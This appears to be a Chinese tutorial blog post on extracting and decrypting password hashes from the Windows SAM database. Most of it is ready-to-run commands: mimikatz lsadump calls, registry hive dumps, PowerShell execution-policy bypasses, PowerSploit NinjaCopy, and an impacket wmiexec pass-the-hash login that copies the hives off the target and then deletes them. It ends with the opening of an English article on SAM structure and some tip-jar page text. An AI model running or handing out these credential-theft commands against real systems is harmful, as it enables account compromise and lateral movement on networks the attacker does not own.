sam文件获取与解密

前言

ntds.dit文件位置: C:\Windows\NTDS\NTDS.dit
system文件位置:C:\Windows\System32\config\SYSTEM
sam文件位置:C:\Windows\System32\config\SAM
#通过SAM数据库获得用户hash的方法


远程读取

mimikatz在线读取SAM数据库

privilege::debug
token::elevate
lsadump::sam

在这里插入图片描述

powershell

利用empire里面的一个powershell脚本,下载地址:
https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-PowerDump.ps1
在这里插入图片描述
从左到右依次是用户名,Rid,ntlm,lm。
Rid为500代表是管理员,504代表是guest账号等。lm跟ntlm的区别是加密方法的不同,具体可以看这篇博客

离线破解

下载system与sam文件的方法

利用注册表(需要administrator权限)

获取当前系统的SAM数据库文件,在另一系统下进行读取,从 sam 中提取目标系统本地用户密码 hash 需要管理员权限。

reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv

在这里插入图片描述

通过NinjaCopy获得sam与system

ninjacopy下载地址:https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1

Import-Module -name .\Invoke-NinjaCopy.ps1
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination "c:\system.hiv"
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SAM" -LocalDestination "c:\sam.hiv"

附录:绕过powershell执行策略的命令:
cmd中:powershell -ep bypass
powershell中:Set-ExecutionPolicy Bypass -Scope Process

也可以参考下面的链接
绕过powershell执行策略的方法

impacket

python wmiexec.py -hashes :3dbde697d71690a769204beb12283678 test/administrator@192.168.124.142
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

get system.save
get sam.save
get security.save

del /f system.save
del /f sam.save
del /f security.save

exit


解密sam文件数据

使用mimikatz,参数为刚刚下载下来的system与sam文件的路径:
lsadump::sam /sam:sam.hiv /system:system.hiv
在这里插入图片描述

在这里插入图片描述

国外经典SAM结构分析资料。 偶尔从google上获得,从网上搜集了一大会,发现比国内的资料简直UP了好些年。 Security Accounts Manager Author: clark@hushmail.com Last updated: 3rd April 2005 ________________________________________ This article is based primarily on a local default setup of NT5.0 Professional or 2K (Windows 2000), however there maybe additional verified references to XP Professional and Server Editions. Much will apply across the NT range, but not all has been verified. Note that this is a partial update from the orginal version, there will be more additions, I just thought it was time to consolidate some stuff. This article has been written concisely and progressively, it is advisable not to skim read. Some stuff is advanced, use a test machine where possible. Special thanks to: (alphabetically ordered) esrever_otua: For pointing out something which I had missed about group memberships. fishy5: For coding XORCheck.exe which calculates the registry hive checksum. mirrorshades: For inspiring a hash database space optimzation technique rattle: For coding ntdate.exe which calculates the NT time format and the LastPolicyTime; a couple of programs for the #DAD8636F687BF15B section and for working on the LM Hash Decoder V1/V2 projects. Serg Wasilenkow: For working on the LM Hash Decoder V1/V2 projects. Vladimir Katalov: For the PWSEx product key and working on the LM Hash Decoder V1/V2 projects. xavic: For inspiring a hash database space optimzation technique Due to length and my decision not to divide this article into separate pages I have split the article into 4 main chapters. 01. Users and Groups 02. (some) Security Settings 03. Registry Structure 04. Passwords
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shanfenglan7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值